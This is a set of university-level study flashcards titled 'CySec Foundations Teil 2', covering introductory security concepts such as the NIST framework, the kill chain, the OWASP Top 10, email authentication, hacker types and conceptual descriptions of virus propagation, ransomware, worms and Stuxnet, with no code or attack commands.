CySec Foundations Teil 2
CySec Foundations Teil 2
CySec Foundations Teil 2
Kartei Details
| Karten | 210 |
|---|---|
| Sprache | Deutsch |
| Kategorie | Informatik |
| Stufe | Universität |
| Erstellt / Aktualisiert | 31.07.2020 / 10.08.2020 |
| Weblink |
https://card2brain.ch/box/20200731_cysec_foundations_teil_2
|
| Einbinden |
<iframe src="https://card2brain.ch/box/20200731_cysec_foundations_teil_2/embed" width="780" height="150" scrolling="no" frameborder="0"></iframe>
|
Steps of the NIST Cyber Security Framework?
1. Identify
2. Protect
3. Detect
4. Respond
5. Recover
What is technical vulnerability management?
a security practise designed to proactively mitigate or prevent the exploitation of vulnerabilities
Which 4 things does the process of technical vulnerability management involve?
1. Identification
2. classification
3. remediation
4. mitigation
of vulnerabilities
What is a security event?
occurrence to have potential security implications
What is a security incident?
occurrence that actually or potentially jeopradizes confidentiality, integrity or availability of information
Sources of security events
- OS logs
- applications logs
- security tool logs
- outbound proxy logs
What does APT stand for?
Advanced Persistent Threat
What is an Advanced Persistent Threat (APT)?
network attack in which unauthorized personell gains access to a network and stays there, undetected for a long time
intention is to steal data
often targets orgs in high-value information sectors
Which 7 phases does the 'Cyber Attack Kill Chain' include?
1. Reconnaissance
2. Weaponization
3. Delivery
4. Exploit
5. Installation
6. Command and Control
7. Actions
What does AAA stand for?
Authentication
Authorization
Accounting
What are the 7 authentication scheme classifications?
1. Basic Authentication
2. One Time Passwords
3. Challenge / Response
4. Anonymous Key Exchange
5. Zero-Knowledge Password Proofs
6. Server certificates plus user authentication
7. Mutual Public Key Authentication
What does MIME stand for?
Multipurpose Internet Mail Extension
What does SPF stand for?
Sender Policy Framework
What does DKIM stand for?
Domain Keys Identified Mail
What is the Sender Policy Framework?
SPF records are TXT records in DNS
a mailserver may check for a SPF records
Name the OWASP Top 10
A1: Injection
A2: Broken Authentication
A3: Sensitive Data Exposure
A4: XML External Entities
A5: Broken Access Control
A6: Security Misconfiguration
A7: Cross-Site Scripting
A8: Insecure Deserialization
A9: Using Components with known vulnerabilites
A10: Insufficient Logging & Monitoring
How do you protect a system against SQL Injection?
- Input validation
- Prepared statements -> no dynamic SQL
Give an example for A3: Sensitive Data Exposure
an input given by a user results in an error and said input is logged. e.g. credit card data
Name the 3 types of XSS
- Stored
- Reflected
- DOM-based
Name the hacker types
- Black Hat
- Grey Hat
- White Hat
- Script Kiddie
- Cyber Terrorist
- State Sponsored
What is the difference between a Script Kiddie and other hacker types?
A script kiddie may not understand what the tools they are using are doing
What is a zero day attack?
- exploits zero-day vulnerabilities
- zero-day exploit is not known to the software vendor
What are the two main functions of viruses?
propagation and destruction
What is virus propagation?
defines how a virus will spread from system to system
Name 4 virus propagation techniques
- master boot record infection
- file infection
- macro infection
- service injection
How does MBR infection work?
virus attacks the portion of the bootable media
1. system reads infected MBR
2. virus instructs it to read and execute the code stored in alternate location
3. system loads entire virus into memory
How does file infection work?
virus infects executable files
How does service injection work?
virus injects itself into trusted runtime processes
e.g. svchost, winlogin, explorer.exe
How does macro infection work?
virus is written in a macro language
macros are executed upon opening of the document
What is a multiparte virus?
virus uses more than one propagation technique
what are stealth viruses?
viruses hide themselves an lead AV software to believe that everything is normal.
e.g. virus might overwrite MBR and modify OS file system functionality
upon checking the MBR, virus will provide it with clean version of MBR to stay hidden
What are polymorphic viruses?
viruses that modify their own code in order not have the same signature
What are encrypted viruses?
- use cryptographic techniques to avoid detection
- use very short segment of code to decrypt: the decryption routine
- each infection has different key, causing them to look different on different machines
What are logic bombs?
- viruses that lie dormat until triggered by a certain event (e.g. program launch, website logon)
What are trojan horses?
- program that appears kind, but has malicious behind the scenes payload
- e.g. rouge AV
What is keystroke logging?
- the action of recording key strikes on a keyboard
- data can then be retrieved by actor thats controlling the program
What is ransomware?
- infects target machine, encrypts files
- user has to pay to receive decryption key
What is special about worms?
They replicate without human intervention
What is Stuxnet?
A worm which targeted the iranian nuclear program
How did Stuxnet replicate?
- unprotected administrative shared
- zero day vulnerabilities in windows server service an print spooler service
- databases with default password
- infected USB drives
